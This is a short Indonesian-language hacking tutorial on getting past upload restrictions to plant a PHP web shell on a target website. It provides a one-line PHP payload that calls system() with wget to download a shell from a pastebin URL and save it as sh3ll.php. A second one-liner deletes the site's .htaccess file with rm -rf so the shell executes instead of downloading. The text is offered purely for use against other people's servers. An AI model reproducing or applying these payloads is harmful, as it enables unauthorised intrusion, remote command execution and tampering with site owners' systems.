Sedikit Tutorial Dari saya, cara bypass upload shell dengan one line command shell.
mungkin yg shell backdoornya pas di upload berhasil tp saat di akses malah ke download, bisa coba cara ini.
- buat file oneline.php
- isi file tersebut dengan code di bawah ini
<?php system('wget
https://pastebin.com/raw/tizUkMj9 -O sh3ll.php');?>
Kemudian upload oneline.php dan akses, shellnya akan ttp terdownload namun command akan tereksekusi
kemudian akses sh3ll.php jika msih terdownload, kalian bisa code oneline.php dengan code ini
<?php system('rm -rf .htaccess');?>
dan lakukan lagi sperti cara di atas.
Referensi Tutorial :
https://sec.linuxploit.com/2020/07/bypass-upload-shell-dengan-one-line.html?m=1